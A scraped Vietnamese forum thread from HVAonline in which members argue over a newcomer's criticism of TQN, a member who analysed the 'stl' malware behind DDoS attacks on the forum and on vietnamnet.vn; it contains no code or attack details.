/hvaonline/posts/list/39641.html#246625 /hvaonline/posts/list/39641.html#246625 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll wrote:

TQN wrote:
Mấy anh stl học lại kỹ thuật code dùng zlib đi nhé ! Em khuyên thành thật ấy. Dùng zlib từ đó tới giờ mà không biết cách uncompress trên memory à ? Ai lại đi chơi lấy buffer zip ghi vào temp file rồi dùng hàm của zlib uncompress, rồi lại ghi vào temp file khác, rồi lại đọc lên. Lúc em RCE, em nói quái, sao đi lòng vòng vầy nè ? Cuối cùng "thì ra em đã hiểu", mấy anh chỉ biết dùng mấy hàm zlib cho file thôi ! Cho em rút lại lời khen thằng coder C++ của mấy anh nhé, code vầy tệ lắm. Gặp em là team leader của nó thì em sạc nó thẵng tay rồi. PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ? 
NÓNG QUÁ, nóng không chịu được... thật là lạ, 3 anh em có hết có 2 chai vodka thôi mà ...!? Thiệt đúng là đám virus "mèo què" này rơi vào tay một con người từng khẳng định "chưa viết virus bao giờ" lại còn đòi "đưa ra bằng chứng" , dám khẳng định trên tầm anonymost và lulzec... thiệt là không xứng, không xứng mà ! :-O  
Câu lập luận trên là nguỵ biện. Người "chưa viết" virus nhưng vững lập trình, vững hợp ngữ, vững cấu trúc của hệ điều hành và quen thuộc với những trò chơi giấu, xoá, mạo danh...v...v... của malware thì vẫn có thể lật tẩy malware rất dễ dàng. Đoạn bồ quote ở trên từ bài của TQN chẳng có chỗ nào nói là TQN khẳng định trên tầm anonymost và lulzec hết. Trên diễn đàn này TQN cũng chưa hề "khẳng định" mình trên tầm ai hết (ngoài chuyện trên tầm stl). Đừng chơi trò nhét chữ vô miệng người khác một cách hồ đồ như vậy. Nhét chữ vô miệng người khác rồi tự kết luận xứng hay không xứng chính là trò nguỵ biện.

s3ll wrote:
:-O tưởng bộ, người nào có nội công thâm hậu mà... chưa từng bỏ thời gian chọc ngoáy, nghịch ngợm này nọ. TQN là ngoại lệ sao !? Thích phân tích thì cứ phân tích đi, sao phải chê bai, mạt sát, chửi bới... Code decode kìa.. họ đã có encode thì tất yếu phải có decode khi họ kích hoạt rồi, TQN giành tặng họ làm chi nữa !? Thật khiến người ta muốn "OẸ" quá mà.  
Nếu TQN phân tích và phê bình sai thì hãy dùng kỹ thuật mà chỉnh TQN một mẻ. Đừng có chuyển hệ sang chỗ phê bình TQN vì TQN phê bình những lỗi quá sơ đẳng của stl. Đúng ra là phải cám ơn TQN vì chính những phê bình ấy chính là "vẽ đường cho hưu chạy" mà sao còn trách TQN? TQN phân tích thì quá nhiều rồi, bồ thấy chưa đủ hay sao mà còn đòi "cứ phân tích đi"? Trong suốt chủ đề này và một số chủ đề khác, TQN đã phân tích và có đủ thẩm quyền để chửi. Không những chửi những thứ buồn cười, những tiểu xảo ngớ ngẩn mà còn chửi những trò đồi bại của những sản phẩm mà stl tạo ra. Bồ còn có trò nguỵ biện khác là thay mặt "người ta" để "oẹ". Bồ muốn "oẹ" thì bồ cứ việc nhưng đừng "oẹ" giùm người khác. Cái trò tự đại diện đám đông là cái trò ăn vô trong máu rồi phải không? Từ khi bồ đăng ký nick trên HVA này, bồ đã viết những gì? Zero! Bồ đã dùng được một tí kỹ thuật nào để phản bác? Zero! Vậy bồ lấy tư cách gì để "oẹ"?

s3ll wrote:
@Conmale: Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà -:|-  
Cái tiêu đề thế nào không quan trọng cho lắm. Cái quan trọng là nội dung của nó. Việc HVA bị DDoS là điểm xuất phát và không phải là điểm kết thúc. Từ chỗ HVA bị DDoS (bị ddos như thế nào, do ai ddos, có những ai khác bị ddos và tình trạng này sẽ đi về đâu....) đến chỗ những nạn nhân khác bị tấn công và những máy tính vô tội bị biến thành zombies... đều nằm trong chủ đề này để khai triển. Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Hôm qua tớ nhận được mail từ dịch vụ hosting bên Đức. Họ cho biết họ sẽ hỗ trợ chống DDoS miễn phí cho server của HVA và sẽ làm việc trực tiếp với những nhà chức trách để dẹp bỏ nguồn DDoS này. Tớ chỉ phì cười một mình và gởi mail cám ơn họ. Nghĩ lại thì thấy chua chát. Ngay cả một đám hosting thương mại còn phản ứng vì một khách hàng bé nhỏ như HVA vậy mà bao nhiêu cơ quan ngôn luận, bao nhiêu cơ quan hữu trách của một quốc gia thì....tịt. Đúng là "tự do và văn minh" đến độ ai muốn làm "do sở thích" thì làm =)) .

s3ll wrote:
@TQN: Có mẫu mới rồi kìa, TQN lại phải vất vả rồi :D . Tớ dám chắc là so với Anonymoust và lulzec thì TQN chưa thể bằng họ đâu :D Xin lỗi Ban quản trị diễn đàn và mọi người nha, đừng "gán" cho tớ cái danh STL hay bênh vực ai cả. Tớ là dân kinh doanh nhưng cũng thích kĩ thuật lắm. Ban quản trị diễn đàn cho tớ gác nhờ bài này nhé ./. Cảm ơn !  
Sao bồ biết có mẫu mới hay vậy? Bồ là dân "kinh doanh" nhưng rảnh để theo cái vụ "mèo què" này và để đôi chối, biện bác cho mớ "mèo què" sao? Việc TQN không bằng Anonymoust và lulzec thì chưa biết nhưng việc TQN phê bình những thứ ngớ ngẩn của stl thì đã quá rõ. Cũng nên công bằng cho TQN một tí vì TQN cũng đã nhiều lần khen stl nữa. Bồ không phải là stl hay chính là stl không thành vấn đề. Vấn đề quan trọng nằm ở chỗ bồ đăng ký nick để phản ứng một cách thiếu kỹ thuật và đầy nguỵ biện với những người đang vạch mặt "mèo què". Có những thứ mà nguỵ biện và giả dối cũng không thể dùng che giấu và biện hộ được.]]>
/hvaonline/posts/list/39641.html#246627 /hvaonline/posts/list/39641.html#246627 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. NÓNG QUÁ, nóng không chịu được... thật là lạ, 3 anh em có hết có 2 chai vodka thôi mà ...!? Thiệt đúng là đám virus "mèo què" này rơi vào tay một con người từng khẳng định "chưa viết virus bao giờ" lại còn đòi "đưa ra bằng chứng" , dám khẳng định trên tầm anonymost và lulzec... thiệt là không xứng, không xứng mà ! :-O   @s3ll: xỉn rồi chăng, nói nhảm nói cuội hay mới newbie register rồi đọc bằng "tốc độ ánh sáng" nên phát ngôn bừa bãi quy chụp mọi người...

s3ll wrote:
:-O tưởng bộ, người nào có nội công thâm hậu mà... chưa từng bỏ thời gian chọc ngoáy, nghịch ngợm này nọ. TQN là ngoại lệ sao !? Thích phân tích thì cứ phân tích đi, sao phải chê bai, mạt sát, chửi bới... Code decode kìa.. họ đã có encode thì tất yếu phải có decode khi họ kích hoạt rồi, TQN giành tặng họ làm chi nữa !? Thật khiến người ta muốn "OẸ" quá mà.  
"oẹ" là đúng chính mọi người cũng "oẹ" đấy s3ll... "oẹ" vì trình độ hiểu biết của cậu và kiến thức của cậu "đủ sức so sánh và đánh giá được việc làm của HVA"

s3ll wrote:
@Conmale: Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà -:|-  
@ s3ll: Cần phải có time để đọc từ page 1 cậu nhé... mọi thành viên ở đây đã nêu rõ mình làm việc gì và vì cái gì rồi.

s3ll wrote:
@TQN: Có mẫu mới rồi kìa, TQN lại phải vất vả rồi :D . Tớ dám chắc là so với Anonymoust và lulzec thì TQN chưa thể bằng họ đâu :D Xin lỗi Ban quản trị diễn đàn và mọi người nha, đừng "gán" cho tớ cái danh STL hay bênh vực ai cả. Tớ là dân kinh doanh nhưng cũng thích kĩ thuật lắm. Ban quản trị diễn đàn cho tớ gác nhờ bài này nhé ./. Cảm ơn !  
cậu kinh doanh gì, nước bọt phải chăng... hay 1 lúc say xỉn rồi bị kích động thần kinh nên nói nhăng nói cuội. Phàm ở đời trâu buộc ghét trâu ăn, đừng tự tin về kiến thức của mình để quy chụp người khác. Đọc kỹ cậu nhé: http://www.thanhnien.com.vn/Pages/20110907/Dau-hieu-kin-cua-tram-cam.aspx Đừng phủ nhận việc làm của người khác kẻo bị RE đấy.]]>
/hvaonline/posts/list/39641.html#246634 /hvaonline/posts/list/39641.html#246634 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

Conmale wrote:
Đoạn bồ quote ở trên từ bài của TQN chẳng có chỗ nào nói là TQN khẳng định trên tầm anonymost và lulzec hết. Trên diễn đàn này TQN cũng chưa hề "khẳng định" mình trên tầm ai hết (ngoài chuyện trên tầm stl). Đừng chơi trò nhét chữ vô miệng người khác một cách hồ đồ như vậy. Nhét chữ vô miệng người khác rồi tự kết luận xứng hay không xứng chính là trò nguỵ biện.  
- Rõ ràng, ai cũng hiểu được nếu không có dẫn chứng trên đó thì có thể tôi không cho vào… Vì sự thật đúng là như vậy đó, tôi chả mất công sức và thời gian đâu để dò tìm lại từng bài post của TQN làm gì cả, điều này TQN là người hiểu rõ nhất… dân làm việc trong lĩnh vực IT Việt Nam chạy đua theo cái “ngọn” của ngành công nghệ mà, phải không ??? Trên thế giới phát triển ra sản phầm phần cứng dựa trên khoa học cơ bản rồi, để rồi dân ta đua nhau cày cày phát triển ứng dụng trên đó !? Lulec thì tôi không biết thành viên, tuy nhiên tôi dám so sánh Anonymoust và “TQN - ở diễn đàn hva này” thì tôi phải dám chắc trình độ của họ hơn, và tôi cũng biết thành viên của họ có người đang làm trong lĩnh vực nghiên cứu đa lõi trong sản phẩm ở Intel, Micro… Trans. Chứ không chỉ dừng lại ở việc tìm hiểu bộ vi xử lý, coding,… trong lĩnh vực RCE thậm chí lớn hơn nữa là “RE” vậy. Đó là lý do tôi đánh giá cao anonymoust hơn đó anh Conmale à !

Conmale wrote:
Bồ còn có trò nguỵ biện khác là thay mặt "người ta" để "oẹ". Bồ muốn "oẹ" thì bồ cứ việc nhưng đừng "oẹ" giùm người khác. Cái trò tự đại diện đám đông là cái trò ăn vô trong máu rồi phải không? Từ khi bồ đăng ký nick trên HVA này, bồ đã viết những gì? Zero! Bồ đã dùng được một tí kỹ thuật nào để phản bác? Zero! Vậy bồ lấy tư cách gì để "oẹ"? Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Hôm qua tớ nhận được mail từ dịch vụ hosting bên Đức. Họ cho biết họ sẽ hỗ trợ chống DDoS miễn phí cho server của HVA và sẽ làm việc trực tiếp với những nhà chức trách để dẹp bỏ nguồn DDoS này. Tớ chỉ phì cười một mình và gởi mail cám ơn họ. Nghĩ lại thì thấy chua chát. Ngay cả một đám hosting thương mại còn phản ứng vì một khách hàng bé nhỏ như HVA vậy mà bao nhiêu cơ quan ngôn luận, bao nhiêu cơ quan hữu trách của một quốc gia thì....tịt. Đúng là "tự do và văn minh" đến độ ai muốn làm "do sở thích" thì làm.  
- Tôi nói “ọe” giùm người khác bao giờ vậy admin “Conmale” ??? Mà đằng ấy muốn tôi đưa ra kĩ thuật để “phản bác” cái gì cơ chứ ??? Bên trên tôi có nói nguyên văn như sau “Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà” . Tôi còn sử dụng dấu “chấm hỏi” kìa… Những bạn nào đọc bài viết đó của tôi cũng có thể hiểu được ý tôi suy nghĩ rằng “họ không phải là do sở thích mà làm”, nên bồ Conmale đừng có dựa vào cái cụm từ đó để mà suy diễn ra này nọ nha. Một con người mà “chi li”, để ý đến từng câu, từng chữ của người khác mà lại có thể đánh giá như vậy sao ??? Thật khiến cho người ta buồn cười quá mà.

Conmale wrote:
Nếu TQN phân tích và phê bình sai thì hãy dùng kỹ thuật mà chỉnh TQN một mẻ. Đừng có chuyển hệ sang chỗ phê bình TQN vì TQN phê bình những lỗi quá sơ đẳng của stl. Đúng ra là phải cám ơn TQN vì chính những phê bình ấy chính là "vẽ đường cho hưu chạy" mà sao còn trách TQN? TQN phân tích thì quá nhiều rồi, bồ thấy chưa đủ hay sao mà còn đòi "cứ phân tích đi"? Trong suốt chủ đề này và một số chủ đề khác, TQN đã phân tích và có đủ thẩm quyền để chửi. Không những chửi những thứ buồn cười, những tiểu xảo ngớ ngẩn mà còn chửi những trò đồi bại của những sản phẩm mà stl tạo ra.  
- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???

TMDTHBC wrote:
cậu kinh doanh gì, nước bọt phải chăng... hay 1 lúc say xỉn rồi bị kích động thần kinh nên nói nhăng nói cuội. Phàm ở đời trâu buộc ghét trâu ăn, đừng tự tin về kiến thức của mình để quy chụp người khác. Đọc kỹ cậu nhé: http://www.thanhnien.com.vn/Pages/20110907/Dau-hieu-kin-cua-tram-cam.aspx Đừng phủ nhận việc làm của người khác kẻo bị RE đấy.  
- Tôi kinh doanh đồ trang sức, .. vả lại cũng không phải là người chuyên đi “nói nhăng, nói cuội” hay là “trầm cảm” như đằng ấy suy diễn đâu nha. Bị trầm cảm thì đâu có đi tụ tập, nói chuyện trên trời dưới biển với anh em, bạn bè tôi được… bị Trầm cảm thì đâu có cái cảm giác NÓNG QUÁ … như vậy được… phải không TMDTHBC ??? Tôi “phủ nhận việc làm của người khác” chỗ nào vậy bạn TMDTHBC ??? .. thế nên không dám để bạn TMDTHBC phải mất công “RE” đâu, “RCE” thì đủ rồi, trong quá trình tìm hiểu IT cũng có viết mấy code phần mềm làm việc cá nhân, nếu bạn TMDTHBC có nhã hứng thì tôi gửi cho bạn RCE để mà hiểu tôi hơn cũng được. Tôi “xin lỗi” vì bài viết này của tôi bị lạc đề, nó đang trong một luồng bài “phân tích” ??? bạn TMDTHBC hiểu không ???]]>
/hvaonline/posts/list/39641.html#246650 /hvaonline/posts/list/39641.html#246650 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246653 /hvaonline/posts/list/39641.html#246653 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#246654 /hvaonline/posts/list/39641.html#246654 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok wrote:
S3ll nhảy vô chỉ để viết nhảm nhí, lạc hướng vẫn đề (chính s3ll cũng đã nói vậy). Đề nghị Mod xóa bài đã gửi của s3ll vì nó chẳng giá trị gì, chỉ lôi kéo thành viên vào cuộc tranh cãi vô bổ. Lưu ý một điểm : s3ll biết có mẫu mới của stl trong khi mọi người chẳng ai biết. Xin xóa luôn bài này. Chân thành cảm ơn! 
Đó, tôi đã xin lỗi đến 2 lần rồi mà Sherlockok vẫn không thông cảm cho tôi :D . Nhưng xét trên khía cạnh với tiêu đề "Phân tích tính chất vài trận DDoS HVA vừa qua." của luồng bài viết này thì tôi nghĩ nó cũng không phải quá là lạc chủ đề lắm đâu, Sherlockok để ý kĩ thì còn có những bài lạc chủ đề "Phân tích" hơn của tôi kìa. Mặt khác, tôi nghĩ đây không phải là "cãi nhau" như Sherlockok nói đâu. Chúng ta chỉ đang tranh luận thôi mà. Mỗi người đọc lại có một cách nghĩ riêng nên Sherlockok đừng có đánh đồng mọi việc như vậy.

Sherlockok wrote:
Lưu ý một điểm điểm : s3ll biết có mẫu mới của stl trong khi mọi người chẳng ai biết.  
Câu nói này của bạn làm mình nhớ đến môt việc, trên diễn đàn virusvn.com ... Có 2 bạn là nhân viên của CMCInfosec và nhân viên của BKAV tranh cãi nhau về các biến thể của mẫu "GoogleCrashHandle", người của CMC thì nói nó đúng là mẫu đã thực hiện DDoS vào vietnamnet.vn , còn người của BKAV lúc đó lại phủ nhận điều này, trong khi các thành viên của diễn đàn đó phải yêu cầu nhân viên của CMCInfoSec đưa ra mẫu, rùi bằng chứng... thì họ mới tin... Tôi nghĩ rằng lúc đó CMC có mãu và phân tích, chứ chưa có đủ yếu tố kĩ thuật để khẳng định 100% rằng đó chính là mẫu đã tấn công vào vietnamnet.vn, và 1 công ty nước ngoài đã thực hiện việc monitor này trong lúc logo.jpg vẫn còn tồn tại trên oxdex.com rồi.. Rốt cục thì đúng mẫu đó là mẫu đã thực hiện DDoS vào vietnamnet.vn trong một thời gian đó... :D Và tất nhiên, việc bạn Sherlockok khẳng định ngoài tôi ra thì "mọi người chẳng ai biết " thật là chưa đúng lắm mà. Có lẽ nhiều người họ biết nhưng họ không thông báo lên, và có thể họ không thích đưa mãu lên... Chả phải TQN và các bạn khác đã và đang có các HTTrack để thường xuyên theo dõi đó sao :D . Mỗi người họ lại có một Track riêng mà, đâu có ai giống ai 100% đâu Sherlockok nhỉ Xin lỗi các thành viên của diễn đàn một lần nữa nha. Cảm ơn!]]>
/hvaonline/posts/list/39641.html#246657 /hvaonline/posts/list/39641.html#246657 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. - Rõ ràng, ai cũng hiểu được nếu không có dẫn chứng trên đó thì có thể tôi không cho vào… Vì sự thật đúng là như vậy đó, tôi chả mất công sức và thời gian đâu để dò tìm lại từng bài post của TQN làm gì cả, điều này TQN là người hiểu rõ nhất… dân làm việc trong lĩnh vực IT Việt Nam chạy đua theo cái “ngọn” của ngành công nghệ mà, phải không ??? Trên thế giới phát triển ra sản phầm phần cứng dựa trên khoa học cơ bản rồi, để rồi dân ta đua nhau cày cày phát triển ứng dụng trên đó !? Lulec thì tôi không biết thành viên, tuy nhiên tôi dám so sánh Anonymoust và “TQN - ở diễn đàn hva này” thì tôi phải dám chắc trình độ của họ hơn, và tôi cũng biết thành viên của họ có người đang làm trong lĩnh vực nghiên cứu đa lõi trong sản phẩm ở Intel, Micro… Trans. Chứ không chỉ dừng lại ở việc tìm hiểu bộ vi xử lý, coding,… trong lĩnh vực RCE thậm chí lớn hơn nữa là “RE” vậy.   Hơ, tôi cũng thường xuyên xem topic này nhưng tôi chưa thấy anh TQN nói anh ấy trên tài Anonymous hay Lul gì cả. Bạn này nói "không có dẫn chứng trên đó thì có thể tôi không cho vào" Thế tôi hỏi lại là dẫn chứng đó ở đâu ? Nếu dẫn chứng đó không tìm thấy trong page này thì hãy đưa liên kết ra đây. Đừng có ở đó mà phán nhảm rồi nói như đã chứng minh được điều gì đó rồi.
- Bên trên tôi có nói nguyên văn như sau “Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà” . Tôi còn sử dụng dấu “chấm hỏi” kìa… Những bạn nào đọc bài viết đó của tôi cũng có thể hiểu được ý tôi suy nghĩ rằng “họ không phải là do sở thích mà làm”  
Việc stl là ai, động cơ thật sự là gì thì vẫn còn đang được tranh luận vì chưa đủ cơ sở kết luận. Ở trước page này vài page có đôi câu tranh luận giữa anh Conmale và bác Mai rồi đấy. Tìm đọc đi. Nếu hỏi thì cứ hỏi thẳng việc gì phải hỏi úp mở thế để dễ bề ngụy biện sau này à ?
- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???  
Hờ, stl họ có giỏi cỡ nào thì việc làm của họ có tương xứng hay không? Không thể chỉ xét riêng lĩnh vực kỹ thuật ở đây được vì những hành vi xấu xa của họ đều dựa trên những kỹ thuật để thực hiện. Kể cả họ là tiền bối lớn tuổi hơn nhưng họ làm nhiều việc xấu thì họ phải bị chửi. Họ dựa trên kỹ thuật để làm việc xấu thì họ phải bị chửi. Sao bạn s3ll có vẻ xấu hổ và tức giận thay cho họ thế ? Thành viên HVA chửi là chửi có đích nhắm hẳn hoi là stl đó chứ không chửi bừa chửi phứa ai đâu.]]>
/hvaonline/posts/list/39641.html#246658 /hvaonline/posts/list/39641.html#246658 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll wrote:
Có 2 bạn là nhân viên của CMCInfosec và nhân viên của BKAV tranh cãi nhau về các biến thể của mẫu "GoogleCrashHandle", người của CMC thì nói nó đúng là mẫu đã thực hiện DDoS vào vietnamnet.vn , còn người của BKAV lúc đó lại phủ nhận điều này, trong khi các thành viên của diễn đàn đó phải yêu cầu nhân viên của CMCInfoSec đưa ra mẫu, rùi bằng chứng... thì họ mới tin... Tôi nghĩ rằng lúc đó CMC có mãu và phân tích, chứ chưa có đủ yếu tố kĩ thuật để khẳng định 100% rằng đó chính là mẫu đã tấn công vào vietnamnet.vn. Xin lỗi các thành viên của diễn đàn một lần nữa nha. Cảm ơn! 
Việc nghĩ của bạn là sai rồi, CMC InfoSec hoàn toàn có đủ chứng cứ và phân tích kỹ thuật cụ thể. Đồng thời, diễn đàn VirusVN không là gì để tôi phải gửi một mẫu virus lên cả ;) , tôi cũng không có trách nhiệm cũng như quyền để leak mẫu virus đi lung tung như một kẻ vô trách nhiệm. Người nào không có đủ thông tin, muốn xin xỏ mà còn xin xỏ kiểu ông trời thì tôi mặc kệ đấy. Việc này tôi đã ghi rõ ở diễn đàn VirusVN nhưng hình như có một số người vẫn cố tình không chịu đọc hiểu ;-) .]]>
/hvaonline/posts/list/39641.html#246659 /hvaonline/posts/list/39641.html#246659 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll wrote:
@Conmale và TMDTHBC : Có vẻ sở thích “quy kết” nhỉ. Nào là “nhét chữ vô miệng” hay là “ngụy biện”, “quy chụp”… gì gì đó nữa ?

Conmale wrote:
Đoạn bồ quote ở trên từ bài của TQN chẳng có chỗ nào nói là TQN khẳng định trên tầm anonymost và lulzec hết. Trên diễn đàn này TQN cũng chưa hề "khẳng định" mình trên tầm ai hết (ngoài chuyện trên tầm stl). Đừng chơi trò nhét chữ vô miệng người khác một cách hồ đồ như vậy. Nhét chữ vô miệng người khác rồi tự kết luận xứng hay không xứng chính là trò nguỵ biện.  
- Rõ ràng, ai cũng hiểu được nếu không có dẫn chứng trên đó thì có thể tôi không cho vào… Vì sự thật đúng là như vậy đó, tôi chả mất công sức và thời gian đâu để dò tìm lại từng bài post của TQN làm gì cả, điều này TQN là người hiểu rõ nhất… dân làm việc trong lĩnh vực IT Việt Nam chạy đua theo cái “ngọn” của ngành công nghệ mà, phải không ??? Trên thế giới phát triển ra sản phầm phần cứng dựa trên khoa học cơ bản rồi, để rồi dân ta đua nhau cày cày phát triển ứng dụng trên đó !? Lulec thì tôi không biết thành viên, tuy nhiên tôi dám so sánh Anonymoust và “TQN - ở diễn đàn hva này” thì tôi phải dám chắc trình độ của họ hơn, và tôi cũng biết thành viên của họ có người đang làm trong lĩnh vực nghiên cứu đa lõi trong sản phẩm ở Intel, Micro… Trans. Chứ không chỉ dừng lại ở việc tìm hiểu bộ vi xử lý, coding,… trong lĩnh vực RCE thậm chí lớn hơn nữa là “RE” vậy. Đó là lý do tôi đánh giá cao anonymoust hơn đó anh Conmale à !  
Thảy ra bằng chứng đi bồ. Nói khơi khơi mà không có bằng chứng thì chẳng có giá trị nào hết. Chỗ nào TQN "khẳng định" rằng cậu ấy "trên tầm" ai? Đưa ra đi, đừng nói chuyện "chả mất công sức", nếu không, bồ dính vô chỗ mạ li thành viên vô căn cứ đó. Từ chỗ chụp mũ TQN, bồ nhảy tới chỗ đôi chối chuyện ai làm cái gì trong lĩnh vực gì rồi đánh giá ai hơn ai thì cũng vô ích và hoàn toàn lạc đề. Đừng có chụp cho TQN cái mũ khinh người hoặc tự cao để hạ thấp TQN (ngang tầm với stl) vì chiêu này cũ kỹ quá rồi. Miễn giùm cho.

s3ll wrote:

Conmale wrote:
Bồ còn có trò nguỵ biện khác là thay mặt "người ta" để "oẹ". Bồ muốn "oẹ" thì bồ cứ việc nhưng đừng "oẹ" giùm người khác. Cái trò tự đại diện đám đông là cái trò ăn vô trong máu rồi phải không? Từ khi bồ đăng ký nick trên HVA này, bồ đã viết những gì? Zero! Bồ đã dùng được một tí kỹ thuật nào để phản bác? Zero! Vậy bồ lấy tư cách gì để "oẹ"? Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Hôm qua tớ nhận được mail từ dịch vụ hosting bên Đức. Họ cho biết họ sẽ hỗ trợ chống DDoS miễn phí cho server của HVA và sẽ làm việc trực tiếp với những nhà chức trách để dẹp bỏ nguồn DDoS này. Tớ chỉ phì cười một mình và gởi mail cám ơn họ. Nghĩ lại thì thấy chua chát. Ngay cả một đám hosting thương mại còn phản ứng vì một khách hàng bé nhỏ như HVA vậy mà bao nhiêu cơ quan ngôn luận, bao nhiêu cơ quan hữu trách của một quốc gia thì....tịt. Đúng là "tự do và văn minh" đến độ ai muốn làm "do sở thích" thì làm.  
- Tôi nói “ọe” giùm người khác bao giờ vậy admin “Conmale” ??? Mà đằng ấy muốn tôi đưa ra kĩ thuật để “phản bác” cái gì cơ chứ ??? Bên trên tôi có nói nguyên văn như sau “Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà” . Tôi còn sử dụng dấu “chấm hỏi” kìa… Những bạn nào đọc bài viết đó của tôi cũng có thể hiểu được ý tôi suy nghĩ rằng “họ không phải là do sở thích mà làm”, nên bồ Conmale đừng có dựa vào cái cụm từ đó để mà suy diễn ra này nọ nha. Một con người mà “chi li”, để ý đến từng câu, từng chữ của người khác mà lại có thể đánh giá như vậy sao ??? Thật khiến cho người ta buồn cười quá mà.  
Nếu vậy, bồ là "người ta" hả? Tôi nói bồ nên phân tích kỹ thuật có nghĩa là bồ nên dùng kiến thức kỹ thuật để sửa lưng TQN thay vì chụp cái mũ vô cớ cho TQN rồi trây trúa ra. Nếu bồ không có khả năng kỹ thuật hay bồ muốn chơi trò úp úp mở mở thì xin miễn cho. Bồ dùng dấu chấm hỏi để rồi bồ phang thêm 1 câu "rõ ràng là ai cũng biết mà" thì hỏi để làm chi? Đây là trò tròng tréo câu chữ, nguỵ biện ý tứ chớ chẳng có thiện ý gì trong này hết.

s3ll wrote:

Conmale wrote:
Nếu TQN phân tích và phê bình sai thì hãy dùng kỹ thuật mà chỉnh TQN một mẻ. Đừng có chuyển hệ sang chỗ phê bình TQN vì TQN phê bình những lỗi quá sơ đẳng của stl. Đúng ra là phải cám ơn TQN vì chính những phê bình ấy chính là "vẽ đường cho hưu chạy" mà sao còn trách TQN? TQN phân tích thì quá nhiều rồi, bồ thấy chưa đủ hay sao mà còn đòi "cứ phân tích đi"? Trong suốt chủ đề này và một số chủ đề khác, TQN đã phân tích và có đủ thẩm quyền để chửi. Không những chửi những thứ buồn cười, những tiểu xảo ngớ ngẩn mà còn chửi những trò đồi bại của những sản phẩm mà stl tạo ra.  
